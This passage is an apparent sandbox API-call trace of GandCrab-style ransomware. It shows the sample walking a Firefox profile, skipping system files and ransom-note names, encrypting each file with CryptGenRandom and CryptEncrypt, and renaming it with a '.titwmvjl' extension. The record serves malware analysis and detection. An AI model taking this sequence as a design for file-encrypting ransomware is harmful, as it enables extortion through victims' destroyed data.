flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0085.007] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".sqlite ") returned 8 [0085.007] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.007] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0085.007] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage.sqlite" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\storage.sqlite"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2d4 [0085.008] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0085.008] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0085.008] CryptAcquireContextW (in: phProv=0x259e6bc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e6bc*=0x4c9980) returned 1 [0085.010] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0085.010] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0085.010] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0085.010] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259e748 | out: pbBuffer=0x259e748) returned 1 [0085.011] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0085.011] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0085.011] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.011] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0085.011] CryptAcquireContextW (in: phProv=0x259e6bc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e6bc*=0x4c9980) returned 1 [0085.013] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0085.013] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0085.014] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0085.014] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259e768 | out: pbBuffer=0x259e768) returned 1 [0085.014] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0085.014] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0085.014] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.014] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0085.015] CryptAcquireContextW (in: phProv=0x259e6b0, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e6b0*=0x4c9980) returned 1 [0085.016] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0085.016] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e6b4 | out: phKey=0x259e6b4*=0x503638) returned 1 [0085.017] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0085.017] CryptGetKeyParam (in: hKey=0x503638, dwParam=0x8, pbData=0x259e6a8, pdwDataLen=0x259e6ac, dwFlags=0x0 | out: pbData=0x259e6a8*=0x800, pdwDataLen=0x259e6ac*=0x4) returned 1 [0085.017] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0085.018] CryptEncrypt (in: hKey=0x503638, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410000*, pdwDataLen=0x259e6e0*=0xc8, dwBufLen=0x100 | out: pbData=0x2410000*, pdwDataLen=0x259e6e0*=0x100) returned 1 [0085.018] GetLastError () returned 0x0 [0085.018] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0085.019] CryptDestroyKey (hKey=0x503638) returned 1 [0085.019] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0085.019] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0085.019] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0085.019] CryptAcquireContextW (in: phProv=0x259e6b0, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e6b0*=0x4c9980) returned 1 [0085.021] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0085.021] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e6b4 | out: phKey=0x259e6b4*=0x5037b8) returned 1 [0085.021] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0085.022] CryptGetKeyParam (in: hKey=0x5037b8, dwParam=0x8, pbData=0x259e6a8, pdwDataLen=0x259e6ac, dwFlags=0x0 | out: pbData=0x259e6a8*=0x800, pdwDataLen=0x259e6ac*=0x4) returned 1 [0085.022] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0085.022] CryptEncrypt (in: hKey=0x5037b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410100*, pdwDataLen=0x259e6e0*=0xc8, dwBufLen=0x100 | out: pbData=0x2410100*, pdwDataLen=0x259e6e0*=0x100) returned 1 [0085.022] GetLastError () returned 0x0 [0085.022] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0085.023] CryptDestroyKey (hKey=0x5037b8) returned 1 [0085.023] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0085.023] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0085.023] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0085.023] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0085.023] ReadFile (in: hFile=0x2d4, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259e78c, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259e78c*=0x200, lpOverlapped=0x0) returned 1 [0085.042] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0xfffffe00, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.042] WriteFile (in: hFile=0x2d4, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x259e770, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259e770*=0x200, lpOverlapped=0x0) returned 1 [0085.045] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.045] WriteFile (in: hFile=0x2d4, lpBuffer=0x2410000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259e770, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesWritten=0x259e770*=0x21c, lpOverlapped=0x0) returned 1 [0085.055] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.061] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.061] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.062] CloseHandle (hObject=0x2d4) returned 1 [0085.063] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage.sqlite" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\storage.sqlite"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage.sqlite.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\storage.sqlite.titwmvjl"), dwFlags=0x1) returned 1 [0085.065] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.066] FindNextFileW (in: hFindFile=0x5033f8, lpFindFileData=0x259e840 | out: lpFindFileData=0x259e840) returned 1 [0085.066] lstrcmpW (lpString1="times.json", lpString2=".") returned 1 [0085.066] lstrcmpW (lpString1="times.json", lpString2="..") returned 1 [0085.066] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\", lpString2="times.json" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\times.json") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\times.json" [0085.066] lstrlenW (lpString=".titwmvjl") returned 9 [0085.066] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\times.json") returned 90 [0085.066] VirtualAlloc (lpAddress=0x0, dwSize=0xf4, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0085.067] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\times.json.titwmvjl") returned 99 [0085.067] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\times.json") returned 90 [0085.067] lstrlenW (lpString=".json") returned 5 [0085.067] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0085.067] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".json ") returned 6 [0085.067] lstrcmpiW (lpString1=".json", lpString2=".titwmvjl") returned -1 [0085.068] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.068] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\times.json") returned 90 [0085.068] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\times.json") returned 90 [0085.068] lstrcmpiW (lpString1="times.json", lpString2="desktop.ini") returned 1 [0085.068] lstrcmpiW (lpString1="times.json", lpString2="autorun.inf") returned 1 [0085.068] lstrcmpiW (lpString1="times.json", lpString2="ntuser.dat") returned 1 [0085.068] lstrcmpiW (lpString1="times.json", lpString2="iconcache.db") returned 1 [0085.068] lstrcmpiW (lpString1="times.json", lpString2="bootsect.bak") returned 1 [0085.068] lstrcmpiW (lpString1="times.json", lpString2="boot.ini") returned 1 [0085.068] lstrcmpiW (lpString1="times.json", lpString2="ntuser.dat.log") returned 1 [0085.068] lstrcmpiW (lpString1="times.json", lpString2="thumbs.db") returned 1 [0085.068] lstrcmpiW (lpString1="times.json", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0085.068] lstrcmpiW (lpString1="times.json", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0085.068] lstrcmpiW (lpString1="times.json", lpString2="KRAB-DECRYPT.html") returned 1 [0085.069] lstrcmpiW (lpString1="times.json", lpString2="CRAB-DECRYPT.html") returned 1 [0085.069] lstrcmpiW (lpString1="times.json", lpString2="KRAB-DECRYPT.txt") returned 1 [0085.069] lstrcmpiW (lpString1="times.json", lpString2="CRAB-DECRYPT.txt") returned 1 [0085.069] lstrcmpiW (lpString1="times.json", lpString2="ntldr") returned 1 [0085.069] lstrcmpiW (lpString1="times.json", lpString2="NTDETECT.COM") returned 1 [0085.069] lstrcmpiW (lpString1="times.json", lpString2="Bootfont.bin") returned 1 [0085.069] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\times.json") returned 90 [0085.069] lstrlenW (lpString=".json") returned 5 [0085.069] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0085.069] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".json ") returned 6 [0085.069] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.070] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0085.070] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\times.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\times.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2d4 [0085.072] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0085.072] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0085.072] CryptAcquireContextW (in: phProv=0x259e6bc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e6bc*=0x4c9980) returned 1 [0085.074] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0085.075] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0085.075] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0085.075] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259e748 | out: pbBuffer=0x259e748) returned 1 [0085.075] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0085.075] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0085.075] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.076] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0085.076] CryptAcquireContextW (in: phProv=0x259e6bc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e6bc*=0x4c9980) returned 1 [0085.078] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0085.079] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0085.079] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0085.079] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259e768 | out: pbBuffer=0x259e768) returned 1 [0085.079] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0085.079] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0085.079] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.080] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0085.080] CryptAcquireContextW (in: phProv=0x259e6b0, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e6b0*=0x4c9980) returned 1 [0085.083] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0085.083] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e6b4 | out: phKey=0x259e6b4*=0x503738) returned 1 [0085.083] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0085.083] CryptGetKeyParam (in: hKey=0x503738, dwParam=0x8, pbData=0x259e6a8, pdwDataLen=0x259e6ac, dwFlags=0x0 | out: pbData=0x259e6a8*=0x800, pdwDataLen=0x259e6ac*=0x4) returned 1 [0085.083] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0085.083] CryptEncrypt (in: hKey=0x503738, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410000*, pdwDataLen=0x259e6e0*=0xc8, dwBufLen=0x100 | out: pbData=0x2410000*, pdwDataLen=0x259e6e0*=0x100) returned 1 [0085.084] GetLastError () returned 0x0 [0085.084] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0085.084] CryptDestroyKey (hKey=0x503738) returned 1 [0085.085] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0085.085] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0085.085] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0085.085] CryptAcquireContextW (in: phProv=0x259e6b0, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e6b0*=0x4c9980) returned 1 [0085.087] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0085.087] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e6b4 | out: phKey=0x259e6b4*=0x503738) returned 1 [0085.087] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0085.087] CryptGetKeyParam (in: hKey=0x503738, dwParam=0x8, pbData=0x259e6a8, pdwDataLen=0x259e6ac, dwFlags=0x0 | out: pbData=0x259e6a8*=0x800, pdwDataLen=0x259e6ac*=0x4) returned 1 [0085.087] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0085.087] CryptEncrypt (in: hKey=0x503738, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410100*, pdwDataLen=0x259e6e0*=0xc8, dwBufLen=0x100 | out: pbData=0x2410100*, pdwDataLen=0x259e6e0*=0x100) returned 1 [0085.088] GetLastError () returned 0x0 [0085.088] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0085.088] CryptDestroyKey (hKey=0x503738) returned 1 [0085.088] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0085.088] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0085.088] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0085.089] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0085.089] ReadFile (in: hFile=0x2d4, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259e78c, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259e78c*=0x1d, lpOverlapped=0x0) returned 1 [0085.113] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0xffffffe3, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.114] WriteFile (in: hFile=0x2d4, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x1d, lpNumberOfBytesWritten=0x259e770, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259e770*=0x1d, lpOverlapped=0x0) returned 1 [0085.118] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.118] WriteFile (in: hFile=0x2d4, lpBuffer=0x2410000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259e770, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesWritten=0x259e770*=0x21c, lpOverlapped=0x0) returned 1 [0085.124] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.134] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.135] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.135] CloseHandle (hObject=0x2d4) returned 1 [0085.137] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\times.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\times.json"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\times.json.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\times.json.titwmvjl"), dwFlags=0x1) returned 1 [0085.138] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.139] FindNextFileW (in: hFindFile=0x5033f8, lpFindFileData=0x259e840 | out: lpFindFileData=0x259e840) returned 1 [0085.139] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0085.139] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0085.139] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\TITWMVJL-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\TITWMVJL-DECRYPT.txt" [0085.139] lstrlenW (lpString=".titwmvjl") returned 9 [0085.139] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\TITWMVJL-DECRYPT.txt") returned 100 [0085.139] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0085.140] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 109 [0085.140] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\TITWMVJL-DECRYPT.txt") returned 100 [0085.140] lstrlenW (lpString=".txt") returned 4 [0085.140] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0085.140] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".txt ") returned 5 [0085.140] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0085.140] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.141] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\TITWMVJL-DECRYPT.txt") returned 100 [0085.141] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\TITWMVJL-DECRYPT.txt") returned 100 [0085.141] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0085.141] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0085.141] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0085.141] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0085.141] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0085.141] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0085.141] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0085.141] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0085.141] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.141] FindNextFileW (in: hFindFile=0x5033f8, lpFindFileData=0x259e840 | out: lpFindFileData=0x259e840) returned 1 [0085.141] lstrcmpW (lpString1="webappsstore.sqlite", lpString2=".") returned 1 [0085.142] lstrcmpW (lpString1="webappsstore.sqlite", lpString2="..") returned 1 [0085.142] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\", lpString2="webappsstore.sqlite" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\webappsstore.sqlite") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\webappsstore.sqlite" [0085.142] lstrlenW (lpString=".titwmvjl") returned 9 [0085.142] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\webappsstore.sqlite") returned 99 [0085.142] VirtualAlloc (lpAddress=0x0, dwSize=0x106, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0085.143] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\webappsstore.sqlite.titwmvjl") returned 108 [0085.143] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\webappsstore.sqlite") returned 99 [0085.143] lstrlenW (lpString=".sqlite") returned 7 [0085.143] VirtualAlloc (lpAddress=0x0, dwSize=0x12, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0085.143] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".sqlite ") returned 8 [0085.143] lstrcmpiW (lpString1=".sqlite", lpString2=".titwmvjl") returned -1 [0085.143] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.144] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\webappsstore.sqlite") returned 99 [0085.144] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\webappsstore.sqlite") returned 99 [0085.144] lstrcmpiW (lpString1="webappsstore.sqlite", lpString2="desktop.ini") returned 1 [0085.144] lstrcmpiW (lpString1="webappsstore.sqlite", lpString2="autorun.inf") returned 1 [0085.144] lstrcmpiW (lpString1="webappsstore.sqlite", lpString2="ntuser.dat") returned 1 [0085.144] lstrcmpiW (lpString1="webappsstore.sqlite", lpString2="iconcache.db") returned 1 [0085.144] lstrcmpiW (lpString1="webappsstore.sqlite", lpString2="bootsect.bak") returned 1 [0085.144] lstrcmpiW (lpString1="webappsstore.sqlite", lpString2="boot.ini") returned 1 [0085.144] lstrcmpiW (lpString1="webappsstore.sqlite", lpString2="ntuser.dat.log") returned 1 [0085.144] lstrcmpiW (lpString1="webappsstore.sqlite", lpString2="thumbs.db") returned 1 [0085.144] lstrcmpiW (lpString1="webappsstore.sqlite", lpString2="TITWMVJL-DECRYPT.txt") returned 1 [0085.144] lstrcmpiW (lpString1="webappsstore.sqlite", lpString2="TITWMVJL-DECRYPT.html") returned 1 [0085.144] lstrcmpiW (lpString1="webappsstore.sqlite", lpString2="KRAB-DECRYPT.html") returned 1 [0085.144] lstrcmpiW (lpString1="webappsstore.sqlite", lpString2="CRAB-DECRYPT.html") returned 1 [0085.144] lstrcmpiW (lpString1="webappsstore.sqlite", lpString2="KRAB-DECRYPT.txt") returned 1 [0085.144] lstrcmpiW (lpString1="webappsstore.sqlite", lpString2="CRAB-DECRYPT.txt") returned 1 [0085.144] lstrcmpiW (lpString1="webappsstore.sqlite", lpString2="ntldr") returned 1 [0085.144] lstrcmpiW (lpString1="webappsstore.sqlite", lpString2="NTDETECT.COM") returned 1 [0085.144] lstrcmpiW 